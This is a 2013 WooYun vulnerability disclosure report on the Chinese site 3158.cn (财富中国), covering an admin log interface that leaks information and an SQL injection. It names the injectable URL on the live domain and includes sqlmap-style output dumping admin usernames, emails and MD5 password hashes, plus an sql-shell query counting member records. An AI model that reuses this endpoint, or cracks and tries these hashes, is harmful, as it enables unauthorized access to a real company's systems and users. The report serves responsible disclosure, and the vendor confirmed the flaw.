当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-022133

漏洞标题:财富中国后台敏感接口越权查看信息+SQL注射得到管理员与用户密码

相关厂商:财富中国

漏洞作者: 小菜虫

提交时间:2013-04-19 13:44

修复时间:2013-06-03 13:44

公开时间:2013-06-03 13:44

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-04-19: 细节已通知厂商并且等待厂商处理中
2013-04-19: 厂商已经确认,细节仅向厂商公开
2013-04-29: 细节向核心白帽子及相关领域专家公开
2013-05-09: 细节向普通白帽子公开
2013-05-19: 细节向实习白帽子公开
2013-06-03: 细节向公众公开

简要描述:

1,财富中国后台敏感接口泄露管理员敏感信息;
2,SQL注入可获取管理员与用户密码(已证明);
3,后台可盲打(未证明)。

详细说明:

1,管理员登录记录泄露敏感信息:

1.png


2,sql注入测试地址:http://home.3158.cn/adminLog/detail?id=44

Database: n_huser3158
Table: cpapp_admin_user
[2 entries]
+---------------+----------+----------------------------------+
| email | username | password |
+---------------+----------+----------------------------------+
| [email protected] | admin | d841432db433ca25567470822c8dd1ee |
| [email protected] | tester | 979125e498250468551c1fecb023c0d7 |
+---------------+----------+----------------------------------+
[13:40:54] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select count(*) from n_huser3158.cpapp_member;
[13:41:11] [INFO] fetching SQL SELECT statement query output: 'select count(*) from n_huser3158.cpapp_member'
select count(*) from n_huser3158.cpapp_member;: '2388'


直接丢工具吧

.jpg


3,会员中心意见反馈那可盲打后台:

1.jpg

漏洞证明:

见详细说明~

修复方案:

听说3158.cn的洞洞有礼物啊。。。

版权声明:转载请注明来源 小菜虫@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-04-19 14:11

厂商回复:

感谢白帽子小菜虫,最近改版问题较多,礼物已经送出,期待您的再次提交!

最新状态:

2013-04-19:不知道为什么不能获取联系方式!请小菜虫pm或者发联系方式到[email protected]